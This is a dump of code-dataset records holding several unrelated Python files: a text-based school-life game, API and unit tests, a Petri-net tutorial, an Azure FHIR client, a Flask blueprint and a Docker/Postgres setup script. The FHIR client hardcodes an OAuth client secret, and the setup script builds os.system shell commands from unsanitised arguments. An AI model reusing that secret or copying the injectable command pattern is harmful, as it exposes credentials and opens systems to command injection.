                  print(\"The freshman were so scared of you that they promised never even to look in your direction again. Your happiness went up 5 points\")\n                            self.happiness +=5\n                            break\n                        if x =='c':\n                            print(\"Bad decision. Never ever let freshman get away with things. Your popularity went down 5 points\")\n                            self.popularity -=5\n                            break\n                        else:\n                            print(\"Error\")\n            elif scenario ==15:\n                if 15 not in completed_scenarios:\n                    completed_scenarios.append(15)\n                    while True:\n                        x = input(\"As you are walking into school you fall into the mud and it now looks like you pooped your pants. What's your next move? \\n a= cry and call your mom \\n b= run to the bathroom and try to get it off \\n c= put on your gym shorts \\n\")\n                        if x=='a':\n                            print(\"Please stop acting like this, it's disgusting. Popularity down 5 points\")\n                            self.popularity -=5\n                            break\n                        if x=='b':\n                            print(\"I mean you did not get the stain out but it ended up looking like a cool design so your popularity and smarts go up 10 points\")\n                            self.popularity +=10\n                            self.smarts +=10\n                            break\n                        if x =='c':\n                            print(\"Finally, you made a normal decision. However it is a little cold out so your happiness is down 5 points\")\n                            self.happiness -=5\n                            break\n                        else:\n                            print(\"Error\")\n\n        elif self.grade == 11:\n            while True:\n                scenario = random.randint(21,25)\n                if scenario not in completed_scenarios:\n                    break\n            if scenario ==21:\n                if 21 not in completed_scenarios:\n                    completed_scenarios.append(21)\n                    while True:\n                        x = input(\"It's SAT time. Did you get a tutor? \\n a= yes \\n b= no \\n\")\n                        if x=='a':\n                            print(\"Since you got a tutor you actually did not fail congrats. You might actually go to college. Your smarts went up 10 points\")\n                            self.smarts += 10\n                            break\n                        if x=='b':\n                            print(\"Why in the world did you not get a tutor? Your smarts went down 10 points\")\n                            self.smarts -= 10\n                            break\n                        else:\n                            print(\"Error\")\n            elif scenario ==22:\n                if 22 not in completed_scenarios:\n                    completed_scenarios.append(22)\n                    while True:\n                        x = input(\"It's time to meet with your guidance counselor about your future. Have you filled out the college packet? \\n a = yes \\n b= no \\n c= college packet? \\n\")\n                        if x=='a':\n                            print(\"Good, you were actually prepared. Smarts are up 5 points\")\n                            self.smarts += 5\n                            break\n                        if x=='b':\n                            print(\"Not surprising. Your smarts are down 5 points\")\n                            self.smarts -= 5\n                            break\n                        if x =='c':\n                            print(\"You should not be at this school. \\n Goodbye!\")\n                            self.status = \"ded\"\n                            break\n                        else:\n                            print(\"Error\")\n            elif scenario ==23:\n                if 23 not in completed_scenarios:\n                    completed_scenarios.append(23)\n                    while True:\n                        x = input(\"It's spring break and you have not started your Sanservino timeline yet. Are you going to? \\n a= yes \\n b= no \\n c= I already finished \\n\")\n                        if x=='a':\n                            print(\"Good thinking. Your smarts went up 10 points\")\n                            self.smarts += 10\n                            break\n                        if x=='b':\n                            print(\"Honestly don't blame you. The 72 hour challenge is the wave. Your happiness is up 5 points\")\n                            self.happiness += 5\n                            break\n                        if x =='c':\n                            print(\"You are the kid no one likes. Your popularity is down 10 points\")\n                            self.popularity -= 10\n                            break\n                        else:\n                            print(\"Error\")\n            elif scenario ==24:\n                if 24 not in completed_scenarios:\n                    completed_scenarios.append(24)\n                    while True:\n                        x = input(\"You are working on your favorite project ever. The TECH MIDTERM!!!!! How much do you love it??? \\n a= so much \\n b= so much \\n c= so much \\n\")\n                        if x=='a':\n                            print(\"YESSSS. Your happiness is up 10 points\")\n                            self.happiness += 10\n                            break\n                        if x=='b':\n                            print(\"YESSSS. Your happiness is up 10 points\")\n                            self.happiness += 10\n                            break\n                        if x =='c':\n                            print(\"YESSSS. 
Your happiness is up 10 points\")\n self.happiness += 10\n break\n else:\n print(\"Error\")\n elif scenario ==25:\n if 25 not in completed_scenarios:\n completed_scenarios.append(25)\n while True:\n x = input(\"Its me. The game. Just wanted to check in and say hi. IK junior year is rough and your probably struggling so here is 10 points in everything. :) Have a good day \\n a = accept the gift \\n\")\n if x=='a':\n self.health += 10\n self.happiness += 10\n self.popularity += 10\n self.smarts += 10\n self.looks += 10\n break\n else:\n print(\"Error\")\n\n elif self.grade == 12:\n while True:\n scenario = random.randint(31,35)\n if scenario not in completed_scenarios:\n break\n if scenario ==31:\n if 31 not in completed_scenarios:\n completed_scenarios.append(31)\n while True:\n x = input(\"\")\n if x=='a':\n break\n if x=='b':\n break\n if x =='c':\n break\n else:\n print(\"Error\")\n elif scenario ==32:\n if 32 not in completed_scenarios:\n completed_scenarios.append(32)\n while True:\n x = input(\"\")\n if x=='a':\n break\n if x=='b':\n break\n if x =='c':\n break\n else:\n print(\"Error\")\n elif scenario ==33:\n if 33 not in completed_scenarios:\n completed_scenarios.append(33)\n while True:\n x = input(\"\")\n if x=='a':\n break\n if x=='b':\n break\n if x =='c':\n break\n else:\n print(\"Error\")\n elif scenario ==34:\n if 34 not in completed_scenarios:\n completed_scenarios.append(34)\n while True:\n x = input(\"\")\n if x=='a':\n break\n if x=='b':\n break\n if x =='c':\n break\n else:\n print(\"Error\")\n elif scenario ==35:\n if 35 not in completed_scenarios:\n completed_scenarios.append(35)\n while True:\n x = input(\"\")\n if x=='a':\n break\n if x=='b':\n break\n if x =='c':\n break\n else:\n print(\"Error\")\n\n\n def study(self):\n if self.month_total in times_studied:\n print(\"We all know you aint studying more than once a month. Nice try\")\n else:\n times_studied.append(self.month_total)\n print('You went to the library to study like a good boy. Your smarts went up 5 points.')\n self.smarts += 5\n \n def workout(self):\n if self.month_total in times_workedout:\n print(\"You got your swole on so hard you broke the gym. Come back at a later time.\")\n else:\n times_workedout.append(self.month_total)\n while True:\n x = input(\"What are you working on? \\n c = cardio \\n f = flexibility \\n w = weights \\n p = pretend to do something \\n\")\n y = random.randint(1,10)\n if y == 1:\n print(\"Nice job bozo. You injured yourself at the gym. Your health is now down 10 points.\")\n self.health -= 10\n break\n elif x == 'c':\n print(\"The only other time I have you seen you ran that fast is into Wendy's when you heard they were having a deal. But hey your looks and health went up 5 points\")\n self.looks += 5\n self.health += 5\n break\n elif x == 'f':\n print(\"Maybe next time youll actually be able to touch your toes but at least you put in some effort. Your health went up 5 points\")\n self.health += 5\n break\n elif x== 'w':\n print(\"Damn the grind really is real. You actually broke a sweat. Not gonna lie im surprised. Your looks went up 10 points\")\n self.looks += 10\n break\n elif x== 'p':\n print(\"This is lowkey sad but hey what works for you works for me so your happiness went up 5 points.\")\n self.happiness += 5\n break\n else:\n print(\"Error\")\n \ncharacter = Person(input(\"What is your name\"),\"alive\",1,1,9,gender,50,happiness,health,smarts,looks)\n\ncharacter.introduce()\n \nif character.gender == \"alien\":\n print(\"⏁⊑⟒ ☌⟟⍀⌰ ⏃⏁ ⏁⊑⟒ ⏚⍜⍜⏁⊑ ⌇⍜⌰⎅ ⎎⟟⎎⏁⊬ ⏚⍜⋏⎅⌇. 
⌰⍜⍜☍ ⟟⋏ ⏁⊑⟒ ☊⍜⍀⋏⟒⍀ ⏁⍜ ⎎⟟⋏⎅ ⏁⊑⟒ ⏁⏃⋏ ⌇⊑⟟⍀⏁.⏁⊑⟒ ☌⍀⟒⏃⏁ ⏃⋏⏁⟟⍾⎍⟟⏁⊬ ⍜⎎ ⋏⍜⏁⊑⟟⋏☌ ⟟⌇ ⏃⌿⌿⏃⍀⟒⋏⏁ ⎎⍀⍜⋔ ⟟⏁⌇ ⏚⟒⟟⋏☌ ⌇⍜ ⎐⟟⌇⟟⏚⌰⟒ ⟟⋏ ⏁⊑⟒ ⏃☊☊⍜⎍⋏⏁⌇ ⍙⟒ ⊑⏃⎐⟒ ⍜⎎ ⏁⊑⟒ ⏚⟒☌⟟⋏⋏⟟⋏☌ ⍜⎎ ⟒⎐⟒⍀⊬ ⋏⏃⏁⟟⍜⋏. ⏁⊑⟟⌇ ⟟⌇ ⎐⟒⍀⊬ ⌿⌰⏃⟟⋏⌰⊬ ⏁⍜ ⏚⟒ ⎅⟟⌇☊⍜⎐⟒⍀⟒⎅ ⟟⋏ ⏁⊑⟒ ⎎⟟⍀⌇⏁ ⌿⏃☌⟒⌇, ⏃⋏⎅ ⌇⍜⋔⟒⏁⟟⋔⟒⌇\")\n character.status = 'ded'\n print('the fbi found you')\n \nwhile character.status == \"alive\":\n if character.month_total ==24:\n character.status = 'graduated'\n break\n if character.month_display == 6:\n character.month_display = 1\n character.grade += 1\n \n if character.health < 0:\n character.health = 0\n if character.health > 100:\n character.health = 100\n if character.happiness < 0:\n character.happiness = 0\n if character.happiness > 100:\n character.happiness = 100\n if character.smarts < 0:\n character.smarts = 0\n if character.smarts > 100:\n character.smarts = 100\n if character.looks < 0:\n character.looks = 0\n if character.looks > 100:\n character.looks = 100\n \n character.stats()\n death_number = random.randint(1,death_chance)\n kill_number = random.randint(1,death_chance)\n if character.health == 0 or death_number == kill_number:\n character.status = \"dead\"\n break\n character.school_scenarios()\n if character.status == \"ded\":\n break\n \n while True:\n print(\"\\n Moves: \\n a = advance a month \\n s = go study at the library \\n w = go workout\")\n move = input(\"What is your next move \\n\")\n if move == 'a':\n print(\"\\n \\n \\n \\n \\n \\n \\n \\n \\n \\n \\n\")\n character.month_up()\n break\n elif move == 's':\n character.study()\n elif move == 'w':\n character.workout()\n else:\n print(\"Error\")\n\nwhile character.status == \"dead\":\n x = random.randint(1,2)\n if x == 1:\n print(\"You died of an advil overdose\")\n break\n if x == 2:\n print(\"You tripped and fell and drowned in the toilet. 
There was no poop in it though so you are all good\")\n        break\nwhile character.status == 'graduated':\n    print(\"Congrats you have graduated\")\n    break\n\n\n##    elif scenario ==36:\n##        if 36 not in completed_scenarios:\n##            completed_scenarios.append(36)\n##            while True:\n##                x = input(\"\")\n##                if x=='a':\n##                    break\n##                if x=='b':\n##                    break\n##                if x =='c':\n##                    break\n##                else:\n##                    print(\"Error\")\n","sub_path":"Bitlife.py","file_name":"Bitlife.py","file_ext":"py","file_size_in_byte":23171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"618012147","text":"import unittest\nimport random\nfrom ewt import ewt_app\nfrom conf import config\nfrom ewt.ewt_const import expect_km_names\n\newt_cfg = config.getEWTConfig()\nstudent_name = ewt_cfg.getStudentUser()\nstudent_password = ewt_cfg.getStudentPassword()\nstudent_app = ewt_app.EWTApp(student_name, student_password)\nstudent_app.set_os_version('593')\n\n\nclass CourseServiceTest(unittest.TestCase):\n    @classmethod\n    def setUpClass(cls):\n        print(\"# This is class setup\")\n\n    @classmethod\n    def tearDownClass(cls):\n        print(\"# This is class teardown\")\n\n    def test_p1_get_km_list(self):\n        # step 1, get the subject (kemu) list\n        km_result = student_app.study.get_kemulist()\n\n        # check the number of subjects and print the sorted list\n        km_names = [k['Name'] for k in km_result['data']]\n        print(\"find km count: {}\".format(len(km_names)))\n        print(\"origin km names: {}\".format(km_names))\n        km_names.sort()\n        print(\"sorted km names: {}\".format(km_names))\n\n        # assert that the expected subject list is a proper subset of the returned list\n        self.assertLess(set(expect_km_names), set(km_names))\n\n    def test_p1_courseservice_get_lesson_detail(self):\n        # step 1, get the subject list and randomly pick one subject\n        km_result = student_app.study.get_kemulist()\n        # must pick from the expected list, because the subject-list API returns extra subjects; that can be counted as a bug of the subject-list API\n        km = random.choice([k for k in km_result['data'] if k['Name'] in expect_km_names])\n        print(\"random select a km: {}(km={})\".format(km['Name'], km['ID']))\n\n        # step 2, get the course list for that subject and randomly pick one course\n        course_result = student_app.study.get_knowledge_course(km['ID'])\n        # print(course_result)\n        course_list = [c for c in course_result['data']['list']]\n        course = random.choice(course_list)\n        print(\"random select a course: {}(id={})\".format(course['title'], course['id']))\n\n        # step 3, get the lesson list for that course and randomly pick one lesson\n        course_detail = student_app.study.get_course_detail(course['id'])\n        for lesson in course_detail['data']['lessonlist']:\n            print(\"{}: {}\".format(lesson['lessonid'], lesson['lessontitle']))\n            print(\"-- videolist count: {}\".format(len(lesson['videolist'])))\n        lesson = random.choice(course_detail['data']['lessonlist'])\n        print(\"random select a lesson: {}(id={})\".format(lesson['lessontitle'], lesson['lessonid']))\n\n        # step 4, call the lesson-detail API and check the returned result\n        lesson_detail = student_app.study.get_lesson_detail(lesson['lessonid'])\n        self.assertIn('data', lesson_detail, lesson_detail)\n        for lesson in lesson_detail['data']['lessonlist']:\n            self.assertIn('lessonid', lesson, \"lesson id not found\")\n            self.assertIn('lessontitle', lesson, \"lesson title not found\")\n            print(\"{}: {}\".format(lesson['lessonid'], lesson['lessontitle']))\n            print(\"-- videolist count: {}\".format(len(lesson['videolist'])))\n","sub_path":"tests/study_tests/app_courseservice_test.py","file_name":"app_courseservice_test.py","file_ext":"py","file_size_in_byte":3092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"422395771","text":"# Petrinet SNAKES tutorial\n\nimport random\nimport tpn\nimport snakes.plugins\nsnakes.plugins.load(tpn, 
\"snakes.nets\", \"snk\")\nsnakes.plugins.load('gv', 'snakes.nets', 'nets')\nfrom nets import *\nfrom snk import *\n\n\nclass Environment:\n def __init__(self,net,trans,place):\n self.net = net\n self.trans = trans\n self.place = place\n self.reward = 0\n \n def addElement(self, src, dst):\n for p in self.place:\n if src == p.name:\n p.add([(0,dst)])\n \n def step(self, actions):\n self.setActions(actions)\n self.net.step()\n self.reward -= 1\n \"\"\"for t in self.trans[::-1]:\n modes = t.modes()\n if len(modes):\n t.fire(modes[0])\n self.reward -= 1\n for p in self.place:\n tok_remove = []\n for tok in p.tokens:\n if tok[1] == p.name:\n self.reward += 5 \n tok_remove.append(tok)\n p.remove(tok_remove)\"\"\"\n return self.reward#, obs\n \n def setActions(self, actions):\n for i in range(len(actions)):\n myList = ''.join(map(str, (\"a\",i,\"=\",actions[i]))) \n self.net.globals.declare(myList)\n\nn = PetriNet(\"stepper\")\nfor i in range(3) :\n n.add_place(Place(\"p%s\" % i, [dot]))\n n.add_transition(Transition(\"t%s\" % i, min_time=i+1, max_time=i*2+1))\n n.add_input(\"p%s\" % i, \"t%s\" % i, Value(dot))\ninit = n.get_marking()\n\nfilename = \"data/value-\"+str(0)+\".png\"\nn.draw(filename)\n\nn.reset()\nclock = 0.0\nfor i in range(3) :\n [print(\"%s[%s,%s]=%s\" % (t.name, t.min_time, t.max_time, \"#\" if t.time is None else t.time)) for t in n.transition()]\n delay = n.time()\n print(\"[%s]\" % clock, \"delay:\", delay)\n clock += delay\n print(\"[%s] fire: t%s\" % (clock, i))\n n.transition(\"t%s\" % i).fire(Substitution())\n\nn.set_marking(init)\nclock = 0.0\nfor i in range(3) :\n [print(\"%s[%s,%s]=%s\" % (t.name, t.min_time, t.max_time, \"#\" if t.time is None else t.time)) for t in n.transition()]\n for j in range(2) :\n delay = n.time()\n print(\"[%s]\" % clock, \"delay:\", delay)\n clock += delay\n print(\"[%s] fire: t%s\" % (clock, i))\n n.transition(\"t%s\" % i).fire(Substitution())\n\"\"\"\ndef envFactory():\n n = PetriNet(\"N\")\n p = [Place(\"p0\", []),\\\n Place(\"p1\", []),\\\n Place(\"p2\", []),\\\n Place(\"p3\", []),\\\n Place(\"p4\", [])]\n t = [Transition(\"t0\", min_time=2, max_time=4),\\\n Transition(\"t1\", min_time=2, max_time=4),\\\n Transition(\"t2\", min_time=2, max_time=4),\\\n Transition(\"t3\", min_time=2, max_time=4),\\\n Transition(\"t4\", min_time=2, max_time=4)]\n# Transition(\"t4\", Expression(\"a1 == 1\"), min_time=2, max_time=4)]\n [n.add_place(p_) for p_ in p]\n [n.add_transition(t_) for t_ in t]\n \n n.add_input(\"p0\", \"t0\", Tuple((Variable(\"x\"), Variable(\"y\"))))\n n.add_output(\"p1\", \"t0\", Tuple((Expression(\"x+1\"), Variable(\"y\"))))\n n.add_input(\"p1\", \"t1\", Tuple((Variable(\"x\"), Variable(\"y\"),Variable(\"a1\"))))\n n.add_output(\"p2\", \"t1\", Tuple((Expression(\"x+1\"), Variable(\"y\"))))\n n.add_input(\"p2\", \"t2\", Tuple((Variable(\"x\"), Variable(\"y\"),Variable(\"a2\"))))\n n.add_output(\"p3\", \"t2\", Tuple((Expression(\"x+1\"), Variable(\"y\"))))\n n.add_input(\"p3\", \"t3\", Tuple((Variable(\"x\"), Variable(\"y\"),Variable(\"a3\"))))\n n.add_output(\"p4\", \"t3\", Tuple((Expression(\"x+1\"), Variable(\"y\"))))\n n.add_input(\"p1\", \"t4\", Tuple((Variable(\"x\"), Variable(\"y\"),Variable(\"a1\"))))\n n.add_output(\"p4\", \"t4\", Tuple((Expression(\"x+4\"), Variable(\"y\"))))\n return Environment(n, t, p)\n \n \nenv = envFactory()#[(0,'p4',0) for _ in range(10)])\n\nprint(env.net.get_marking())\nfor _ in range(5):\n env.addElement('p0','p4')\nprint(env.net.get_marking())\n#filename = 
\"data/value-\"+str(0)+\".png\"\n#env.net.draw(filename)\nfor i in range(15):\n actions = [0,random.choice([0,1]),0,0,0]\n cummulative_reward = env.step(actions)\n print(cummulative_reward)\n #filename = \"data/value-\"+str(i+1)+\".png\"\n #env.net.draw(filename)\n \"\"\"","sub_path":"old/main_with_time.py","file_name":"main_with_time.py","file_ext":"py","file_size_in_byte":4093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"549023565","text":"import requests\nimport json\nfrom datetime import datetime\n\nclass Connect():\n CLIENT_ID = \"0f6332f4-c060-49fc-bcf6-548982d56569\"\n CLIENT_SECRET = \"ux@CJAaxCD85A9psm-Wdb?x3/Z4c6gp9\"\n SCOPE = \"https://gosh-fhir-synth.azurehealthcareapis.com/.default\"\n FHIR_BASE_URL = \"https://gosh-fhir-synth.azurehealthcareapis.com\"\n payload = \"grant_type=client_credentials&client_id={}&client_secret={}&scope={}\".format(CLIENT_ID, CLIENT_SECRET, SCOPE)\n url = \"https://login.microsoftonline.com/ca254449-06ec-4e1d-a3c9-f8b84e2afe3f/oauth2/v2.0/token\"\n headers = { 'content-type': \"application/x-www-form-urlencoded\" }\n api_url = \"https://json-fhir-tool.azurewebsites.net/api/json-fhir-tool\"\n\n def get_access_token(self): \n res = requests.post(Connect.url, Connect.payload, headers=Connect.headers)\n if res.status_code == 200:\n response_json = res.json()\n return response_json.get('access_token', None)\n\n def submit_blood_pressure(self, patient_id, systolic, diastolic):\n date = datetime.now().strftime(\"%Y-%m-%dT%H:%M:%S.%fz\")\n token = self.get_access_token()\n body = {\n 'token': token, \n \"fhir_url\": \"https://gosh-fhir-synth.azurehealthcareapis.com\", \n \"date\": date, \n \"systolic\": int(systolic), \n \"diastolic\": int(diastolic), \n \"patient_id\": patient_id, \n \"type\": \"bloodpressure\"\n }\n fhir = requests.post(Connect.api_url, json=body)\n if fhir.status_code == 200:\n if self.post_to_FHIR(fhir.json(), token) == 201:\n return body\n\n\n def submit_heart_rate(self, patient_id, heart_rate):\n date = datetime.now().strftime(\"%Y-%m-%dT%H:%M:%S.%fz\")\n token = self.get_access_token()\n body = {\n \"token\": token, \n \"fhir_url\": \"https://gosh-fhir-synth.azurehealthcareapis.com\", \n \"date\": date, \n \"heartrate\": int(heart_rate), \n \"patient_id\": patient_id, \n \"type\": \"heartrate\"\n }\n fhir = requests.post(Connect.api_url, json=body)\n if fhir.status_code == 200:\n if self.post_to_FHIR(fhir.json(), token) == 201:\n return body\n \n def post_to_FHIR(self, data, token):\n observation_url = \"https://gosh-fhir-synth.azurehealthcareapis.com/Observation\"\n status = requests.post(observation_url, json=data, headers={'content-type': \"application/json\", 'Authorization': 'Bearer ' + token})\n return status.status_code\n\n\n ","sub_path":"access.py","file_name":"access.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"293674128","text":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\nfrom heat.engine import environment\nfrom heat.engine import resource\nfrom heat.engine.resources import template_resource\n\nfrom heat.tests import generic_resource as generic_rsrc\nfrom heat.tests.common import HeatTestCase\n\n\nclass MyCloudResource(generic_rsrc.GenericResource):\n pass\n\n\nclass ProviderTemplateTest(HeatTestCase):\n def setUp(self):\n super(ProviderTemplateTest, self).setUp()\n resource._register_class('OS::ResourceType',\n generic_rsrc.GenericResource)\n resource._register_class('myCloud::ResourceType',\n MyCloudResource)\n\n def test_get_os_empty_registry(self):\n # assertion: with an empty environment we get the correct\n # default class.\n env_str = {'resource_registry': {}}\n env = environment.Environment(env_str)\n cls = resource.get_class('OS::ResourceType', 'fred', env)\n self.assertEqual(cls, generic_rsrc.GenericResource)\n\n def test_get_mine_global_map(self):\n # assertion: with a global rule we get the \"mycloud\" class.\n env_str = {'resource_registry': {\"OS::*\": \"myCloud::*\"}}\n env = environment.Environment(env_str)\n cls = resource.get_class('OS::ResourceType', 'fred', env)\n self.assertEqual(cls, MyCloudResource)\n\n def test_get_mine_type_map(self):\n # assertion: with a global rule we get the \"mycloud\" class.\n env_str = {'resource_registry': {\n \"OS::ResourceType\": \"myCloud::ResourceType\"}}\n env = environment.Environment(env_str)\n cls = resource.get_class('OS::ResourceType', 'fred', env)\n self.assertEqual(cls, MyCloudResource)\n\n def test_get_mine_resource_map(self):\n # assertion: with a global rule we get the \"mycloud\" class.\n env_str = {'resource_registry': {'resources': {'fred': {\n \"OS::ResourceType\": \"myCloud::ResourceType\"}}}}\n env = environment.Environment(env_str)\n cls = resource.get_class('OS::ResourceType', 'fred', env)\n self.assertEqual(cls, MyCloudResource)\n\n def test_get_os_no_match(self):\n # assertion: make sure 'fred' doesn't match 'jerry'.\n env_str = {'resource_registry': {'resources': {'jerry': {\n \"OS::ResourceType\": \"myCloud::ResourceType\"}}}}\n env = environment.Environment(env_str)\n cls = resource.get_class('OS::ResourceType', 'fred', env)\n self.assertEqual(cls, generic_rsrc.GenericResource)\n\n def test_get_template_resource(self):\n # assertion: if the name matches {.yaml|.template} we get the\n # TemplateResource class.\n env_str = {'resource_registry': {'resources': {'fred': {\n \"OS::ResourceType\": \"some_magic.yaml\"}}}}\n env = environment.Environment(env_str)\n cls = resource.get_class('OS::ResourceType', 'fred', env)\n self.assertEqual(cls, template_resource.TemplateResource)\n","sub_path":"heat/tests/test_provider_template.py","file_name":"test_provider_template.py","file_ext":"py","file_size_in_byte":3533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"585458766","text":"import sympy\nimport Library_SympyExpressionRestrictVariables\nimport Library_TestLooper\nimport Library_StringExpressionToSympyExpression\nimport Library_SympyExpressionEquality\nimport copy\n\n\n\n#Create some variables:\npi = sympy.pi\nx = sympy.Symbol('x')\nn = sympy.Symbol('n')\nT = sympy.Symbol('T')\n\n#Create a copy with the main variable restricted\nx_restricted = sympy.Symbol('x', real=True)\nn_restricted = sympy.Symbol('n', real=True)\nT_restricted = sympy.Symbol('T', real=True)\n\n#Create a basic sympy expression of more than 1 
variable\nFourierBasisExpression = sympy.sin(n*pi*x/T )\nFourierBasisExpressionRestrictedX = sympy.sin( n*pi*x_restricted/ T )\nFourierBasisExpressionRestrictedNXT = sympy.sin( n_restricted*pi*x_restricted/ T_restricted )\n\nArgSetExpectedResultCombos = []\nArgSetExpectedResultCombos.append(\n (\n \n {\n \"SympyExpression\": FourierBasisExpression, \n \"Restrictions\": {'real':True}, \n \"VariableNames\": ['x', 'z'] #No z exists in the expression -> should throw error\n }\n , \n Exception('')\n )\n)\n\nArgSetExpectedResultCombos.append(\n (\n \n {\n \"SympyExpression\": FourierBasisExpression, \n \"Restrictions\": {'real':True}, \n \"VariableNames\": ['x']\n }\n , \n FourierBasisExpressionRestrictedX\n )\n)\n\nArgSetExpectedResultCombos.append(\n (\n \n {\n \"SympyExpression\": FourierBasisExpressionRestrictedX, \n \"Restrictions\": None, \n \"VariableNames\": ['x']\n }\n , \n FourierBasisExpression\n )\n)\n\nArgSetExpectedResultCombos.append(\n (\n \n {\n #Remove all restrictions\n \"SympyExpression\": FourierBasisExpressionRestrictedNXT, \n \"Restrictions\": None, \n \"VariableNames\": None\n }\n , \n FourierBasisExpression\n )\n)\n\nArgSetExpectedResultCombos.append(\n (\n \n {\n #Remove all restrictions\n \"SympyExpression\": FourierBasisExpressionRestrictedNXT, \n \"Restrictions\": None, \n \"VariableNames\": None\n }\n , \n FourierBasisExpression\n )\n)\n\n\nLoopResult = Library_TestLooper.Main(\n FunctionToTest = Library_SympyExpressionRestrictVariables.Main,\n ArgSetExpectedResultCombos = ArgSetExpectedResultCombos,\n OrderOfMagnitudeRatioMax = 0.1,\n HardDifferenceMax = 1.0,\n DoEqualityCheck = True,\n DoContainmentCheck = False,\n MinFlatResultLength = None,\n MaxFlatResultLength = None,\n ResultOrderMatters = True, \n EqualityCheckFunction = Library_SympyExpressionEquality.Main,\n PrintExtra = True,\n)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Test_SympyExpressionRestrictVariables.py","file_name":"Test_SympyExpressionRestrictVariables.py","file_ext":"py","file_size_in_byte":2712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"533490895","text":"from flask import Blueprint\n\nfrom .decorators import http_cache, templated\nfrom .models import Project\n\nprojects = Blueprint('projects', __name__, url_prefix='/projects')\n\n\n@projects.route('')\n@http_cache()\n@templated()\ndef index():\n projects = Project.query.filter_by(is_active=True).order_by(Project.name)\n return {'projects': projects}\n\n\n@projects.route('/')\n@http_cache()\n@templated()\ndef detail(name):\n return {\n 'project': Project.query.filter_by(name=name).first_or_404()\n }\n","sub_path":"jazzband/projects.py","file_name":"projects.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"266909068","text":"# query.py\nimport json\n\ndef query(query_type, q):\n\tif query_type not in ('count', ):\n\t\tprint('query type not yet supported')\n\t\treturn None\n\tcount = 0\n\tfor _class in data['classes']:\n\t\tfor student in _class['students']:\n\t\t\tif student['name'].lower() == q.lower():\n\t\t\t\tcount += 1\n\n\treturn count\n\n\ndef group_by_name(class_name):\n\treturn_this = {}\n\tfor _class in data['classes']:\n\t\tif _class['name'] != class_name:\n\t\t\tcontinue\n\t\tfor student in _class['students']:\n\t\t\tstudent_name = student['name']\n\t\t\tif student_name not in return_this:\n\t\t\t\treturn_this[student_name] = 
0\n\t\t\treturn_this[student_name] += 1\n\t\tbreak\n\n\treturn return_this\n\n\n\n\nif __name__ == '__main__':\n\tdata = None\n\twith open('in.json') as json_obj:\n\t\tdata = json.loads(json_obj.read())\n\tprint(json.dumps(data, indent=2))\n\t# input_lst = ['Riju']\n\tinput_lst = ['I', 'II', 'III']\n\tfor q in input_lst:\n\t\t# print(query('count', q))\n\t\tprint(group_by_name(q))","sub_path":"interview/ocrolus/dict/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"596398164","text":"import os, sys, getopt\nfrom shutil import copytree\nfrom time import sleep\n\ndef get_args(argv):\n    help_text = \"Usage: main.py -d dbname -f filename [-u, --user][-c, --container]\\nFor more options, try running config.py\"\n\n    if not argv:\n        print(help_text)\n        sys.exit()\n\n    try:\n        opts, args = getopt.getopt(argv,\"f:d:uceh\",[\"dbname=\",\"filename=\", \"user=\", \"encoding=\"])\n    except getopt.GetoptError:\n        print(help_text)\n        sys.exit(2)\n\n    for opt, arg in opts:\n        if opt == '-h':\n            print(help_text)\n            sys.exit()\n\n        elif opt in (\"-d\", \"--dbname\"):\n            TAGS['dbname'] = arg\n\n        elif opt in (\"-f\", \"--filename\"):\n            TAGS['filename'] = arg\n\n        elif opt in ('-u', '--user'):\n            TAGS['user'] = arg\n\n        elif opt in ('-c', '--container'):\n            TAGS['container_name'] = arg\n\n        elif opt in ('-e', '--encoding'):\n            TAGS['encoding'] = arg\n\ndef replace_tags(tags: dict, path: str):\n    '''Replace each tag with its value in the files under `path`'''\n\n    for base_file in ('Dockerfile', 'docker-compose.yml'):\n        with open(f'{path}/{base_file}', 'r') as file:\n            text = file.read()\n\n        # swap in the tag values\n        for tag in tags.keys():\n            text = text.replace('$'+tag, tags[tag])\n\n        # rewrite the file with the replaced tags\n        with open(f'{path}/{base_file}', 'w') as file:\n            file.write(text)\n\ndef main():\n    # parse the arguments passed on the command line\n    get_args(sys.argv[1:])\n\n    BASE_DIR = os.path.join(os.getcwd(), 'public/')\n    HOST_DIR = os.path.join(os.getcwd(), f\"{TAGS['dbname']}/\")\n\n    if TAGS['dbname'] in os.listdir():\n        print('A folder with the same name already exists')\n        exit(1)\n\n    TAGS['base_dir'] = BASE_DIR\n    TAGS['host_dir'] = HOST_DIR\n\n    # create the folder with copies of the base files\n    copytree(BASE_DIR, HOST_DIR)\n    os.mkdir(os.path.join(HOST_DIR, 'volumes'))\n\n    # rewrite the tags\n    replace_tags(TAGS, HOST_DIR)\n\n    # run the container\n    os.chdir(TAGS['host_dir'])\n    os.system(f\"docker-compose up -d\")\n    sleep(10)\n    os.system(f\"docker exec -it {TAGS['container_name']} createdb {TAGS['dbname']}\")\n    os.system(f\"docker exec -it {TAGS['container_name']} pg_restore -d {TAGS['dbname']} {TAGS['filename']}\")\n    os.system(f\"docker exec -it {TAGS['container_name']} psql -d {TAGS['dbname']}\")\n\nTAGS = {\n    'container_name': 'postgres_container',\n    'dbname': 'new_db',\n    'user': 'postgres',\n    'password':'postgres',\n\n    'pgadmin_email': 